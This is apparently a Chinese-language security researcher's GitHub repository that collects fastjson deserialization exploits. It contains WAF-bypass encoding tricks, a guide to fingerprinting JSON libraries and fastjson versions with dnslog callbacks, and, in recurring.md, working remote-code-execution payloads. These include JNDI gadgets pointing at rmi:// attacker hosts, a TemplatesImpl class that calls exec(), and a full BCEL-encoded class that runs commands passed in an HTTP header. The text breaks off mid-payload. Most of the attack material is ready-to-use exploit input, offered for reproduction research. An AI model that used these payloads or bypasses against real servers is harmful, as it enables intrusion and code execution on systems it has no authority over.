├── README.md ├── bypass └── bypass.md ├── fastjsonCheck ├── attachments │ ├── Pasted image 20221114152727.png │ ├── Pasted image 20221114152732.png │ ├── Pasted image 20221114152841.png │ ├── Pasted image 20221114153516.png │ ├── Pasted image 20221114153913.png │ ├── Pasted image 20221118102601.png │ ├── Pasted image 20221118153949.png │ ├── Pasted image 20221118153958.png │ ├── Pasted image 20221118171808.png │ ├── Pasted image 20221124153332.png │ ├── image-20230730134436335.png │ └── image-20230730134501843.png └── fastjsonCheck.md └── recurring.md /README.md: -------------------------------------------------------------------------------- 1 | # fastjson 全版本漏洞复现 2 | 3 | By. Whoopsunix 4 | 5 | # Why fastjson? 6 | 7 | fastjson复现简单、调用链多,很多时候反而更像是在看其他组件的序列化链,很适合拿来做java研究 8 | 9 | 所以起了个项目记录自己复现过的POC,顺便记录pom依赖,毕竟找环境还是挺麻烦的 10 | 11 | ~~后续poc 环境 分析文章在 github 同步 https://github.com/Whoopsunix/fastjson_study~~ 12 | 13 | 备份笔记的时候发现很多后面实测案例都丢掉了 分项目维护起来很麻烦 之后有更改都写到 [博客](https://whoopsunix.com/#/docs/components/cves/fastjson/README) 里去了 14 | 15 | # 环境 16 | 17 | [环境](https://github.com/Whoopsunix/PPPVULNS/tree/master/components/fastjsonDemo) 18 | 19 | # json检测 20 | 21 | 通过实战案例记录不断更新,如何区分不同的框架、dnslog探测、版本探测、利用链探测 22 | 23 | [fastjson check](fastjsonCheck/fastjsonCheck.md) 24 | 25 | # 全版本poc合集 26 | 27 | [1.2.24-1.2.80 poc](recurring.md) 28 | 29 | # bypass 30 | 31 | 绕过手段 32 | 33 | [bypass](bypass/bypass.md) 34 | 35 | # 其他利用 36 | 37 | 二次反序列化、原生反序列化相关在其他项目中 38 | 39 | # 感谢以下师傅的研究 40 | 41 | + 42 | + https://github.com/LeadroyaL/fastjson-blacklist fastjson黑白名单 43 | + https://github.com/safe6Sec/Fastjson 目前最全的poc合集 44 | + https://github.com/su18/hack-fastjson-1.2.80 1.2.80 POC 45 | + https://github.com/safe6Sec/ShiroAndFastJson 1.2.80 poc含环境 46 | + https://mp.weixin.qq.com/s/5mO1L5o8j_m6RYM6nO-pAA 版本区分 47 | + https://b1ue.cn/archives/506.html 浅蓝博客 48 | + https://github.com/knownsec/KCon/tree/master/2022 浅蓝kcon分享 49 | + 
https://www.yulegeyu.com/2022/11/12/Java%E5%AE%89%E5%85%A8%E6%94%BB%E9%98%B2%E4%B9%8B%E8%80%81%E7%89%88%E6%9C%ACFastjson-%E7%9A%84%E4%B8%80%E4%BA%9B%E4%B8%8D%E5%87%BA%E7%BD%91%E5%88%A9%E7%94%A8/ 50 | 雨了个雨 低版本 bcel -------------------------------------------------------------------------------- /bypass/bypass.md: -------------------------------------------------------------------------------- 1 | ```java 2 | JSON.parse("{\"@type\":\"org.example.User\",\"username\":\"1\"}") 3 | 4 | &User { 5 | username: 1 6 | } 7 | ``` 8 | 9 | # WAF bypass 10 | 11 | demo 12 | 13 | ```json 14 | { 15 | "@type": "org.example.User", 16 | "username": "1" 17 | } 18 | ``` 19 | 20 | # 编码绕过 21 | 22 | fastjson 对 key,value 值会自动进行 hex 解码和 unicode解码 23 | 24 | hex 25 | 26 | ```json 27 | { 28 | "\x40\x74\x79\x70\x65": "\x6f\x72\x67\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x55\x73\x65\x72", 29 | "username": "1" 30 | } 31 | ``` 32 | 33 | unicode 34 | 35 | ```json 36 | { 37 | "@type": "\u006f\u0072\u0067\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0055\u0073\u0065\u0072", 38 | "username": "1" 39 | } 40 | 41 | { 42 | "\u0040\u0074\u0079\u0070\u0065": "\u006f\u0072\u0067\u002e\u0065\u0078\u0061\u006d\u0070\u006c\u0065\u002e\u0055\u0073\u0065\u0072", 43 | "username": "1" 44 | } 45 | ``` 46 | 47 | # 字符填充 48 | 49 | ```json 50 | { 51 | "@type": "org.example.User", 52 | "username": "1", 53 | "f": "a*20000" 54 | } 55 | ``` 56 | 57 | 二次反序列化 58 | 59 | $ref 60 | 61 | http://www.bmth666.cn/bmth_blog/2022/04/11/Fastjson%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0/#%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0 62 | 63 | 编码 64 | 65 | https://blog.csdn.net/fmyyy1/article/details/121674546 66 | 67 | 绕过 WAF ,在部分中间件中,multipart 支持指定 Content-Transfer-Encoding 可以使用 Base64 或 quoted-printable (QP 编码) 68 | 来绕过 WAF 69 | 70 | 大量字符绕过 WAF 71 | 72 | ``` 73 | [11111111111111111111111111111111111,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... ,[11111111111111111111111111111111111... 
,[11111111111111111111111111111111111... ,...,{'\x40\u0074\x79\u0070\x65':xjava.lang.AutoCloseable"... ]]]]] 74 | 75 | ``` 76 | 77 | 各种特性 78 | 79 | ``` 80 | ,new:[NaN,x'00',{,/*}*/'\x40\u0074\x79\u0070\x65':xjava.lang.AutoClosea ble" 81 | ``` 82 | 83 | -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152727.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152727.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152732.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152732.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114152841.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114152841.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114153516.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114153516.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221114153913.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221114153913.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118102601.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118102601.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118153949.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118153949.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118153958.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118153958.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221118171808.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221118171808.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/Pasted image 20221124153332.png: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/Pasted image 20221124153332.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/image-20230730134436335.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/image-20230730134436335.png -------------------------------------------------------------------------------- /fastjsonCheck/attachments/image-20230730134501843.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Whoopsunix/fastjson_study/f27d921c9aad6603e54880f998f5a196f64ecf9a/fastjsonCheck/attachments/image-20230730134501843.png -------------------------------------------------------------------------------- /fastjsonCheck/fastjsonCheck.md: -------------------------------------------------------------------------------- 1 | # json框架区分 2 | 3 | # json框架区分 4 | 5 | 给定正常对象 User 6 | 7 | ```java 8 | public class User { 9 | String username; 10 | int password; 11 | float id; 12 | } 13 | ``` 14 | 15 | 利用报错信息、回显信息来区分json框架最直接的方式是更改原json数据构造错误语法(比如删去 `"`) ,通过异常信息中的关键字识别。 16 | 17 | 这种方式需要的最重要的一个前置条件就是报错需要回显,且需要是json框架的报错。比如在实战中遇到一些做了统一错误处理的站点,原本用来判断 18 | jackson 的方式(添加字符破坏的方式),在参数处理时就已经触发Exception,这种情况其实是不好确定的。 19 | 20 | ## fastjson 21 | 22 | 1. 浮点精度不丢失 23 | 其他 json 解析库在解析json时都会丢失,但fastjson不会 24 | 25 | ```json 26 | { 27 | "username": "1234", 28 | "password": 1.111111111111111111111111111111111, 29 | "id": 1.1111111111111111111111111111111111111 30 | } 31 | ``` 32 | 33 | 2. 响应状态 34 | 如果是fastjson会对@type做出响应 35 | 36 | ```json 37 | { 38 | "@type": "whatever" 39 | } 40 | ``` 41 | 42 | 3. 
DNSLOG 43 | DNSLOG 这种方式可以无回显探测fastjson,是较为高效的一种方法,但不适用于不出网环境,具体探测方式在后文展开 44 | 45 | ```json 46 | { 47 | "x": { 48 | "@type": "java.net.InetSocketAddress"{ 49 | "address":, 50 | "val": "dnslog" 51 | }} 52 | } 53 | ``` 54 | 55 | ## jackson 56 | 57 | 1. 严格要求与bean对象对齐,可少不能多,因此添加多余kv 报错 58 | 59 | ```json 60 | { 61 | "username": "1234", 62 | "password": "123", 63 | "a": 1 64 | } 65 | ``` 66 | 67 | 2. 无法解析单引号 报错 68 | 69 | ```json 70 | { 71 | 'username': '1234', 72 | 'password': '123' 73 | } 74 | ``` 75 | 76 | 3. 无法识别注释符 报错 77 | 78 | ```json 79 | { 80 | "username": "1234", 81 | "password": "123" 82 | }/**/ 83 | ``` 84 | 85 | ## gson 86 | 87 | 1. 浮点无法转整数 报错 88 | 向 int 类型的值传浮点数无法解析会报错 NumberFormatException 89 | 90 | ```json 91 | { 92 | "username": "1234", 93 | "password": 1.111111111111111111111111111111111, 94 | "id": 1 95 | } 96 | ``` 97 | 98 | 2. 特有解析 99 | org.json 与 gson 在遇到 # 时都会当注释符处理,可以用来识别这两个框架 100 | 101 | ```json 102 | #\n{"username": "1234", "password": 1, "id": 1.1} 103 | ``` 104 | 105 | 而gson 在不开启 `JsonReader.setLenient(true)` 的情况下(默认未开启),再拼接一个json字符串时会报错,可以用来区分这两个框架 106 | 107 | ```json 108 | #\n{a: 1}\n{\"username\":\"1234\",\"password\":1,\"id\":1.1} 109 | ``` 110 | 111 | ## org.json 112 | 113 | 1. 
特有解析 114 | org.json 打印会调用 toString() 所以可以插入 `\n \r`等字符改变输出,如结合前面的 `#` 再加上 `\r` 115 | 116 | ```json 117 | #{"username": "\r"} 118 | ``` 119 | 120 | ## 举例实测案例 121 | 122 | ## fastjson 123 | 124 | 对于某正常登陆接口 125 | 126 | ![](attachments/Pasted%20image%2020221114152732.png) 127 | 128 | 添加多余key不报错,排除jackson 129 | 130 | ![](attachments/Pasted%20image%2020221114152841.png) 131 | 132 | 寻找另外一个整数值的接口改成浮点数,触发报错,但报错信息与gson预想不一致,还需要判断 133 | 134 | ![](attachments/Pasted%20image%2020221114153516.png) 135 | 136 | 拼接特有解析 `#\n{a:1}\n`,在排除gson的同时,通过报错信息得到组件为fastjson 1.2.83 137 | 138 | ![](attachments/Pasted%20image%2020221114153913.png) 139 | 140 | ## jackson 141 | 142 | ![](attachments/Pasted%20image%2020221118102601.png) 143 | 144 | # *Feign案例 145 | 146 | 存在一个接口可以解析一个 dnslog 的请求 147 | 148 | ![image-20230730134501843](attachments/image-20230730134501843.png) 149 | 150 | 但是如果是用 fastjson 可解析的不规范格式就会报错,报错字符中很明显的存在 jackson 字样 151 | 152 | ![image-20230730134436335](attachments/image-20230730134436335.png) 153 | 154 | 最后发现用了 Feign 库来做 json 转换,限定得使用标准 json 格式 155 | 156 | ```xml 157 | 158 | 159 | io.github.openfeign 160 | feign-jackson 161 | 12.4 162 | 163 | 164 | ``` 165 | 166 | # *ParseArray情况 167 | 168 | 需要注意的是如果使用 JSON.parseArray() 解析,需要 [] 包裹 payload 才不会报错。 169 | 170 | ```java 171 | String contents = "[{\"name\":\"whoopsunix\",\"age\":18}]"; 172 | JSON.parseArray(contents); 173 | ``` 174 | 175 | # dnslog 176 | 177 | 这里给出8条fastjson的调用链进行测试,如果存在fastjson框架则会收到 dns 请求,其中`java.net.URL` 在 1.2.24中不会解析 178 | 179 | ```bash 180 | {"1":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}} 181 | {"2":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}} 182 | {"3":{"@type":"com.alibaba.fastjson.JSONObject",{"@type": "java.net.URL","val":"http://dnslog"}}""}} 183 | {"4":{"@type":"java.net.Inet4Address","val":"dnslog"}} 184 | {"5":{"@type":"java.net.Inet6Address","val":"dnslog"}} 185 | {"5":{"@type":"java.net.InetAddress","val":"dnslog"}} 186 | 
{"6":Set[{"@type":"java.net.URL","val":"http://dnslog"}]} 187 | {"7":{{"@type":"java.net.URL","val":"http://dnslog"}:0}} 188 | ``` 189 | 190 | 在 dnslog 域名被禁用的情况下,有回显也可以用一些正常域名测试是否存在DNS配置或出网 191 | 192 | ```json 193 | { 194 | "a": { 195 | "@type": "java.net.InetAddress", 196 | "val": "www.baidu.com" 197 | } 198 | } 199 | ``` 200 | 201 | # fastjson版本探测 202 | 203 | 需要注意的是部分系统是不支持 [] 形式包裹的,根据站点特性灵活改变写法 204 | 205 | ```json 206 | { 207 | "username": { 208 | "@type": "whatever" 209 | } 210 | } 211 | ``` 212 | 213 | ## 精确版本号1 214 | 215 | 有报错回显的情况下,返回精确版本号 216 | 217 | ```json 218 | { 219 | "@type": "java.lang.AutoCloseable" 220 | ``` 221 | 222 | ![](attachments/Pasted%20image%2020221118153949.png) 223 | 224 | ## 精确版本号2 225 | 226 | 对于存在 FastJsonHttpMessageConverter 配置的解析,通常指定了key值或json结构,可通过添加`[]`等方式破坏既定结构,实例: 227 | 228 | ```json 229 | [ 230 | { 231 | "@type": "whatever" 232 | } 233 | ] 234 | ``` 235 | 236 | ![](attachments/Pasted%20image%2020221124153332.png) 237 | 238 | ## dnslog 239 | 240 | 在没有回显的情况下,如果可以出网就要考虑dnslog了 241 | 242 | 前文提到1.2.24版本不会解析 `java.net.URL` 243 | ,而在之前的研究中,1.2.47、1.2.68、1.2.80是漏洞的三个里程碑版本,通过`java.lang.Class`、`java.lang.AutoCloseable`、`java.lang.Exception` 244 | 来构造dns请求可以准确识别 245 | 246 | payload向下兼容版本, 247 | 248 | ### 1.2.47 249 | 250 | ```json 251 | [ 252 | { 253 | "@type": "java.lang.Class", 254 | "val": "java.io.ByteArrayOutputStream" 255 | }, 256 | { 257 | "@type": "java.io.ByteArrayOutputStream" 258 | }, 259 | { 260 | "@type": "java.net.InetSocketAddress" 261 | { 262 | "address":, 263 | "val": "dnslog" 264 | } 265 | } 266 | ] 267 | ``` 268 | 269 | ### 1.2.68 270 | 271 | ```json 272 | [ 273 | { 274 | "@type": "java.lang.AutoCloseable", 275 | "@type": "java.io.ByteArrayOutputStream" 276 | }, 277 | { 278 | "@type": "java.io.ByteArrayOutputStream" 279 | }, 280 | { 281 | "@type": "java.net.InetSocketAddress" 282 | { 283 | "address":, 284 | "val": "dnslog" 285 | } 286 | } 287 | ] 288 | ``` 289 | 290 | ### 1.2.80 291 | 292 | 
在68和80都只会接收到第一个dnslog请求,83会收到第二个请求 293 | 294 | ```json 295 | [ 296 | { 297 | "@type": "java.lang.Exception", 298 | "@type": "com.alibaba.fastjson.JSONException", 299 | "x": { 300 | "@type": "java.net.InetSocketAddress" 301 | { 302 | "address":, 303 | "val": "1.dnslog.cn" 304 | } 305 | } 306 | }, 307 | { 308 | "@type": "java.lang.Exception", 309 | "@type": "com.alibaba.fastjson.JSONException", 310 | "message": { 311 | "@type": "java.net.InetSocketAddress" 312 | { 313 | "address":, 314 | "val": "2.dnslog.cn" 315 | } 316 | } 317 | } 318 | ] 319 | ``` 320 | 321 | # 利用链探测 322 | 323 | ## Character 报错回显 324 | 325 | 探测到存在的类时将 Class 强转为 Char 导致报错回显 326 | 327 | ```json 328 | { 329 | "x": { 330 | "@type": "java.lang.Character"{ 331 | "@type": "java.lang.Class", 332 | "val": "com.fastjsoncheck.User" 333 | } 334 | } 335 | ``` 336 | 337 | ![](attachments/Pasted%20image%2020221118171808.png) 338 | 339 | ## Class回显 340 | 341 | 当类存在时将返回一个类实例 342 | 343 | ```json 344 | { 345 | "p": { 346 | "@type": "java.lang.Class", 347 | "val": "com.fastjsoncheck.User" 348 | } 349 | } 350 | ``` 351 | 352 | ## dnslog外带 353 | 354 | 该方式有限制,在mac环境下可以ping带 `{}` 的域名,Linux、win会报错 355 | 356 | ```json 357 | { 358 | "@type": "java.net.Inet4Address", 359 | "val": { 360 | "@type": "java.lang.String"{ 361 | "@type": "java.util.Locale", 362 | "val": { 363 | "@type": "com.alibaba.fastjson.JSONObject",{ 364 | "@type": "java.lang.String" 365 | "@type": "java.util.Locale", 366 | "country": "dnslog", 367 | "language": { 368 | "@type": "java.lang.String"{ 369 | "x": { 370 | "@type": "java.lang.Class", 371 | "val": "org.python.antlr.ParseException" 372 | } 373 | }} 374 | } 375 | } 376 | ``` -------------------------------------------------------------------------------- /recurring.md: -------------------------------------------------------------------------------- 1 | # fastjson全版本漏洞复现 2 | 3 | By. 
Whoopsunix 4 | 5 | # fastjson <=1.2.24 反序列化代码执行 6 | 7 | ## JdbcRowSetImpl 8 | 9 | ```json 10 | { 11 | "@type": "com.sun.rowset.JdbcRowSetImpl", 12 | "dataSourceName": "rmi://192.168.16.126:1099/whoopsunix", 13 | "autoCommit": true 14 | } 15 | ``` 16 | 17 | ## TemplatesImpl 18 | 19 | ```json 20 | { 21 | "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl", 22 | "_bytecodes": ["base64 poc"], 23 | "_name": "Whoopsunix", 24 | "_tfactory": {}, 25 | "_outputProperties": {}, 26 | } 27 | ``` 28 | 29 | Exec.java 30 | ```java 31 | public class Exec extends AbstractTranslet { 32 | static { 33 | try { 34 | Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator"); 35 | } catch (Exception e){ 36 | 37 | } 38 | } 39 | 40 | @Override 41 | public void transform(DOM document, SerializationHandler[] handlers) throws TransletException { 42 | 43 | } 44 | 45 | @Override 46 | public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException { 47 | 48 | } 49 | } 50 | ``` 51 | 52 | ## bcel 53 | jdk8u251之后 bcel被移除 54 | ### tomcat-dbcp 55 | ```xml 56 | 57 | org.apache.tomcat 58 | tomcat-dbcp 59 | 7.0.47 60 | 61 | ``` 62 | 63 | ```http 64 | POST /test HTTP/1.1 65 | Host: 127.0.0.1:8080 66 | Content-Type: application/json 67 | cmd: whoami 68 | 69 | 70 | { 71 | { 72 | "@type": "com.alibaba.fastjson.JSONObject", 73 | "x":{ 74 | "@type": "org.apache.tomcat.dbcp.dbcp.BasicDataSource", 75 | "driverClassLoader": { 76 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" 77 | }, 78 | "driverClassName": 
"$$BCEL$$$l$8b$I$A$A$A$A$A$A$A$8dV$cb$5b$TW$U$ff$5dH27$c3$m$g$40$Z$d1$wX5$a0$q$7d$d8V$81Zi$c4b$F$b4F$a5$f8j$t$c3$85$MLf$e2$cc$E$b1$ef$f7$c3$be$ec$a6$df$d7u$X$ae$ddD$bf$f6$d3$af$eb$$$ba$ea$b6$ab$ae$ba$ea$7fP$7bnf$C$89$d0$afeq$ee$bd$e7$fe$ce$ebw$ce$9d$f0$cb$df$3f$3e$Ap$I$df$aaHbX$c5$IF$a5x$9e$e3$a8$8a$Xp$8ccL$c1$8b$w$U$e4$U$iW1$8e$T$i$_qLp$9c$e4x$99$e3$94$bc$9b$e4$98$e2$98VpZ$o$cep$bc$c2qVE$k$e7Tt$e2$3c$c7$F$b9$cep$bc$ca1$cbqQ$G$bb$c4qY$c1$V$VW$f1$9a$U$af$ab0PP$b1$h$s$c7$9c$5c$85$U$f3$i$L$iE$F$96$82E$86$c4$a8$e5X$c1Q$86$d6$f4$c0$F$86X$ce$9d$T$M$j$93$96$p$a6$x$a5$82$f0$ce$Z$F$9b4$7c$d4$b4$pd$7b$3e0$cc$a5$v$a3$5c$bb$a2j$U$yQ$z$94$ac$C$9b$fc2$a8y$b7$e2$99$e2$84$r$z$3b$f2e$cfr$W$c6$cd$a2$9bY4$96$N$N$H1$a4$a0$a4$c1$81$ab$a1$8ck$M$a3$ae$b7$90$f1k$b8y$cf$u$89$eb$ae$b7$94$b9$$$K$Z$d3u$C$b1$Sd$3cq$ad$o$fc$ms6$5cs$a1z$c2$b5$e7$84$a7$c0$d3$e0$p$60$e8Z$QA$84$Y$L$C$cf$wT$C$e1S$G2l$d66$9c$85l$ce6$7c_C$F$cb$M$9b$d7$d4$a7$L$8b$c2$M$a8$O$N$d7$b1$c2p$ec$ff$e6$93$X$de$b2$bda$d0$b6Z$$$7e$d9u$7c$oA$5d$cb$8ca$a7$M$bc$92$f1C$db5$lup$92$c03$9e$V$I$aa$eb$86$ccto$b3A1$I$ca$99$J$S$cd$d1C$c3$Ja$Q$tM$d5$e5$DY$88$867$f0$s$f5$d9$y$cd1$u$ae$9fq$a80$Foix$h$efhx$X$ef$d1$e5$cc$c9i$N$ef$e3$D$86$96$acI$b0l$c1r$b2$7e$91$8eC$a6$86$P$f1$R$e9$q$z$81$ed0l$a9$85$a8$E$96$9d$cd$9b$86$e3$c8V$7c$ac$e1$T$7c$aa$e13$7c$ae$e0$a6$86$_$f0$a5l$f8W$e4$e1$f2$98$86$af$f1$8d$86$5b2T$7c$de$aeH$c7q$d3ve$d1$9dk$f9$8e$af$98$a2$iX$$$85$e85$ddRv$de$f0$83E$dfu$b2$cb$V$8a$b4$3aM$M$3dk6$9e$98$b7$a9$85$d9$v$R$U$5d$w$b0$f3$d2$e4$a3$E$8c4$91r$ae$e8$RS4$cdf$c5$f3$84$T$d4$cf$5d$e9$81$c9GQd$d9M$d4FSW$9b$a1I7$a4Yo$827$5cI$9b$N$_$a8M6mj$gjmz$7d$9e$eb$3c$8e$84$ad$ad$d7vl$D$9bK$ebl$g$bd4$b3C$ee$S$96$b3$ec$$$R$edG$g$7d$85$cf$a0$c9W$a4$gX$af$a2$feSN$c7$85i$h$9e$98$ab$e7$d6$ee$8b$60$cc4$85$ef$5b$b5$efF$y$7dQ$7eW$g$a7$f1$86$l$88R$f8$40$cexnYx$c1$N$86$7d$ff$c1$c3j$L$db$C$f7$7c$99$8cr$86$9c$9a$e6n$ad$82$b8$7c$a7$86$e5$Q$c1$bd$8d$8esE$c3$cb$cb$d7$e2$98bd$e0$o$Be$5b$c3Nt$ae$ef$e4H$7d$c6k$aa$b3$V$t$b0J$f5$c7$5c$3ft7$99Ej2$8c$89$VA$_$u$9d$de$60$Q$h$z$88
$C$c9Vs$a8H$c9$b0$89B$9dt$ca$95$80$y$85A$acm$ab$87$b3$dcl$c3$F$99$f7$a47$bc$90$eck$V_$i$X$b6U$92$df$U$86$fd$ff$ceu$e3c$96E84$ef$e8$c3$B$fa$7d$91$7f$z$60$f2$ebM2C$a7$9d$b42Z$e3$83w$c1$ee$d0$86$nK2QS$s$c0$f1D$j$da$d2O$O$da$Ip$f5$kZ$aahM$c5$aa$88$9f$gL$rZ$efC$a9$82O$k$60$b4KV$a1NE$80$b6$Q$a0$d5$B$83$a9$f6h$3b$7d$e0$60$84$j$8e$N$adn$e3$91$dd$s$b2Ku$84$d0$cd$c3$89H$bbEjS1$d2$ce$b6$a6$3a$f3$f2J$d1$VJ$a2KO$84R$8f$d5$3dq$5d$d1$e3$EM$S$b4$9b$a0$ea$cf$e8$iN$s$ee$93TS$5b$efa$5b$V$3d$v$bd$8a$ed$df$p$a5$ab$S$a3$ab$b1To$fe6$3a$e4qG$ed$b8$93d$5cO$e6u$5e$c5c$a9$5d$8d$91u$k$3a$ff$J$bbg$ef$a1OW$ab$e8$afb$cf$5d$3c$9e$da$5b$c5$be$w$f6$cb$a03$a1e$3a$aaD$e7Qz$91$7e$60$9d$fe6b$a7$eeH$e6$d9$y$bb$8cAj$95$ec$85$83$5e$92IhP$b1$8d$3a$d0G$bb$n$b4$e306$n$87$OLc3f$b1$F$$R$b8I$ffR$dcB$X$beC7$7e$c0VP$a9x$80$k$fc$K$j$bfa$3b$7e$c7$O$fcAM$ff$T$bb$f0$Xv$b3$B$f4$b11$f4$b3Y$ec$a5$88$7b$d8$V$ec$c7$93$U$edY$c4$k$S$b8M$c1S$K$9eVp$a8$$$c3M$b8$7fF$n$i$da$k$c2$93s$a3$e099$3d$87k$pv$e4$l$3eQL$40E$J$A$A" 79 | } 80 | }: "x" 81 | } 82 | ``` 83 | 84 | ```xml 85 | 86 | org.apache.tomcat 87 | tomcat-dbcp 88 | 8.5.42 89 | 90 | ``` 91 | 92 | ```json 93 | POST /test HTTP/1.1 94 | Host: 127.0.0.1:8080 95 | Content-Type: application/json 96 | cmd: whoami 97 | 98 | { 99 | { 100 | "@type": "com.alibaba.fastjson.JSONObject", 101 | "x":{ 102 | "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource", 103 | "driverClassLoader": { 104 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader" 105 | }, 106 | "driverClassName": "$$BCEL$$" 107 | } 108 | }: "x" 109 | } 110 | ``` 111 | 112 | ## spring 113 | ### PropertyPathFactoryBean 114 | ```xml 115 | 116 | org.springframework.boot 117 | spring-boot-starter 118 | 119 | ``` 120 | 121 | ```json 122 | { 123 | "@type": "org.springframework.beans.factory.config.PropertyPathFactoryBean", 124 | "targetBeanName": "rmi://192.168.1.2:1099/whoopsunix", 125 | "propertyPath": "whoopsunix", 126 | "beanFactory": { 127 | "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", 128 | 
"shareableResources": [ 129 | "rmi://192.168.1.2:1099/whoopsunix" 130 | ] 131 | } 132 | } 133 | ``` 134 | 135 | 136 | ### DefaultBeanFactoryPointcutAdvisor 137 | ```xml 138 | 139 | org.springframework.boot 140 | spring-boot-starter 141 | 142 | ``` 143 | 144 | ```json 145 | { 146 | "@type": "org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor", 147 | "beanFactory": { 148 | "@type": "org.springframework.jndi.support.SimpleJndiBeanFactory", 149 | "shareableResources": [ 150 | "rmi://192.168.1.2:1099/whoopsunix" 151 | ] 152 | }, 153 | "adviceBeanName": "rmi://192.168.1.2:1099/whoopsunix" 154 | } 155 | ``` 156 | 157 | # fastjson 1.2.25-1.2.32 反序列化 158 | 来自雨了个雨师傅的研究,进行一下整合 159 | ## bcel 160 | ### ibatis 161 | ```xml 162 | 163 | org.mybatis 164 | mybatis 165 | 3.5.0 166 | 167 | ``` 168 | 169 | ```http 170 | POST /test HTTP/1.1 171 | Host: 127.0.0.1:8080 172 | Content-Type: application/json 173 | X-Token: whoami 174 | 175 | 176 | { 177 | "a":{ 178 | "@type":"java.lang.Class", 179 | "val":"com.sun.org.apache.bcel.internal.util.ClassLoader" 180 | }, 181 | "b":{ 182 | "@type":"java.lang.Class", 183 | "val":"org.apache.ibatis.datasource.unpooled.UnpooledDataSource" 184 | }, 185 | "c":{ 186 | "@type": "com.alibaba.fastjson.JSONObject", 187 | "name": { 188 | "@type": "java.lang.Class", 189 | "val": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource" 190 | } 191 | }, 192 | "d":{ 193 | "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader", 194 | "e": { 195 | "f":{{ 196 | "@type": "com.alibaba.fastjson.JSONObject", 197 | "g": { 198 | "@type": "org.apache.ibatis.datasource.unpooled.UnpooledDataSource", 199 | "driverClassLoader": { 200 | "$ref": ".." 
